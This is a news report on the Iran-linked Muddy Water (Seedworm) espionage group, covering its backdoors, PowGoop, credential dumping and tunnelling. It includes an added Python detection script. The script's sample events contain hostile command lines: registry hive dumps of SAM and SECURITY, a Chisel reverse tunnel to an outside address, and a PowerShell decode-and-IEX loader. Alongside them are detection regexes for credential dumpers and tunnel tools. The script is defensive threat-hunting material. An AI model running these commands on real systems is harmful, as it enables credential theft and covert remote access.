A cyber espionage group known as Muddy Water (Seedworm) thought to be working on behalf of the Iranian government is continuing to target entities in the Middle East. In recent months, Symantec’s Threat Hunter team has observed multiple hacking attempts against government organizations and telecommunications operators in Iraq, Kuwait, Turkey and the United Arab Emirates.
In a recent wave of attacks the group has been deploying a known Seedworm backdoor (Backdoor.Mori), and researchers said that many of the organizations attacked by Muddy Water have also been targeted by the relatively new PowGoop malware, suggesting that the group has added the tool to its bag of tricks. However, Symantec says that at present it “can only establish a medium-confidence link between PowGoop and Seedworm.”
“In the majority of recent infections, PowGoop appears to have been deployed via a remote execution tool known as Remadmin. This tool is used to execute PowerShell to read and decode the contents of a file which is used to execute the contents in memory,” Symantec said.
Additionally, during PowGoop activity, the research team also observed the attackers downloading tools and some unknown content from GitHub repos.
Symantec says it detected attacks involving PowGoop against organizations in government, technology, telecoms, oil and gas, real estate, and education sectors in Iraq, Afghanistan, Israel, Turkey, Azerbaijan, Georgia, Cambodia, and Vietnam.
In the recent attacks the researchers observed the hackers stealing credentials by dumping the contents of the Windows Registry to files in the same directories as Seedworm backdoors, and using the Quarks password dumper (Quarks PwDump) to steal local account password hashes. The attackers also established tunnels to their own infrastructure with the help of open-source tools such as Secure Sockets Funneling (SSF) and Chisel, which allowed the malicious actor to configure local and remote port forwarding as well as copy files to compromised machines.
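The two preceding descriptions (PowerShell that reads, decodes and executes a file in memory; registry hive dumps, Quarks PwDump and Chisel/SSF tunnels) translate fairly directly into command-line triage rules for process-creation telemetry. The script below is an added example and is not Symantec's detection logic: the event records, hosts, timestamps, paths and command lines are constructed for the demonstration, and the Quarks PwDump executable name, the PowerShell read/decode/invoke patterns and the rule names are assumptions. It also goes one step beyond the text by correlating a hive dump and a credential dumper that share one directory, since the article notes the dumps were written beside the backdoor.

```python
"""Heuristic triage of Windows process-creation command lines for the activity
described in the article. Added example, not Symantec's detection logic; all
sample events below are constructed, and the executable names and PowerShell
patterns are assumptions rather than published indicators."""
import ntpath
import re
from collections import defaultdict

# Rule 1: "reg save" of the credential-bearing hives (SAM, SECURITY, SYSTEM).
REG_HIVE_SAVE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|security|system)\b", re.I)
# Rule 2: Quarks PwDump (executable name is an assumption).
QUARKS_PWDUMP = re.compile(r"quarks[-_]?pwdump|\bpwdump\b", re.I)
# Rule 3: Chisel or SSF binaries launched with arguments.
TUNNEL_TOOL = re.compile(r"\b(?:chisel|ssf[cd]?)(?:\.exe)?\s+\S", re.I)
# Rule 4: PowerShell that reads a file, decodes it and invokes the result.
PS_HOST = re.compile(r"\bpowershell(?:\.exe)?\b|\bpwsh(?:\.exe)?\b", re.I)
PS_READ = re.compile(r"Get-Content|\bgc\b|ReadAllText|ReadAllBytes", re.I)
PS_DECODE = re.compile(r"FromBase64String|GZipStream|-bxor", re.I)
PS_INVOKE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)


def classify(cmdline):
    """Return the list of rule names that a single command line triggers."""
    hits = []
    if REG_HIVE_SAVE.search(cmdline):
        hits.append("registry_hive_dump")
    if QUARKS_PWDUMP.search(cmdline):
        hits.append("quarks_pwdump")
    if TUNNEL_TOOL.search(cmdline):
        hits.append("tunnel_tool")
    if (PS_HOST.search(cmdline) and PS_READ.search(cmdline)
            and PS_DECODE.search(cmdline) and PS_INVOKE.search(cmdline)):
        hits.append("powershell_decode_and_invoke")
    return hits


def _staging_dir(cmdline, rule):
    """Directory the event touches: the dump output path for reg save, the
    executable's own directory for the dumper. Lower-cased because NTFS paths
    compare case-insensitively."""
    tokens = cmdline.split()
    path = tokens[-1] if rule == "registry_hive_dump" else tokens[0]
    return ntpath.dirname(path).lower()


def triage(events):
    """Run every event through the rules, then correlate per host: a hive dump
    and a credential dumper sharing one directory becomes an extra finding."""
    findings = []
    dirs_by_host = defaultdict(lambda: defaultdict(set))
    for ev in events:
        for rule in classify(ev["cmdline"]):
            findings.append({"host": ev["host"], "ts": ev["ts"], "rule": rule})
            if rule in ("registry_hive_dump", "quarks_pwdump"):
                dirs_by_host[ev["host"]][_staging_dir(ev["cmdline"], rule)].add(rule)
    for host, dirs in dirs_by_host.items():
        for d, rules in dirs.items():
            if len(rules) == 2:
                findings.append({"host": host, "ts": None,
                                 "rule": "shared_staging_dir", "dir": d})
    return findings


# Constructed sample events (not real telemetry). Hosts, times and paths are invented.
SAMPLE_EVENTS = [
    {"ts": "2021-01-12T08:01:03Z", "host": "WS-01",
     "cmdline": r"reg.exe save HKLM\SAM C:\Users\Public\Libraries\sam.hiv"},
    {"ts": "2021-01-12T08:01:05Z", "host": "WS-01",
     "cmdline": r"reg.exe save HKLM\SECURITY C:\Users\Public\Libraries\sec.hiv"},
    {"ts": "2021-01-12T08:02:40Z", "host": "WS-01",  # arguments omitted; name is assumed
     "cmdline": r"C:\Users\Public\Libraries\QuarksPwDump.exe"},
    {"ts": "2021-01-12T08:10:11Z", "host": "WS-02",
     "cmdline": r"chisel.exe client 203.0.113.5:8000 R:3389:127.0.0.1:3389"},
    {"ts": "2021-01-12T08:15:27Z", "host": "WS-03",
     "cmdline": r"powershell.exe -nop -w hidden -c $d=[IO.File]::ReadAllText('C:\ProgramData\cfg.txt');IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($d)))"},
    {"ts": "2021-01-12T08:20:00Z", "host": "WS-04",  # benign: reads a file, no decode/invoke
     "cmdline": r"powershell.exe -c Get-Content C:\logs\app.log"},
    {"ts": "2021-01-12T08:21:00Z", "host": "WS-05",  # benign: export of a user key, not a hive
     "cmdline": r"reg.exe export HKCU\Software\Contoso C:\Temp\contoso.reg"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The PowerShell rule deliberately requires all three stages (read, decode, invoke) on one command line so that ordinary file reads are not flagged; a Remadmin-style deployment that splits those stages across several processes would need the same three checks applied across a parent/child process chain instead.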
“Seedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering operations across the Middle East. While the connection between PowGoop and Seedworm remains tentative, it may suggest some retooling on Seedworm’s part. Any organizations who do find evidence of PowGoop on their networks should exercise extreme caution and perform a thorough investigation,” the researchers warned.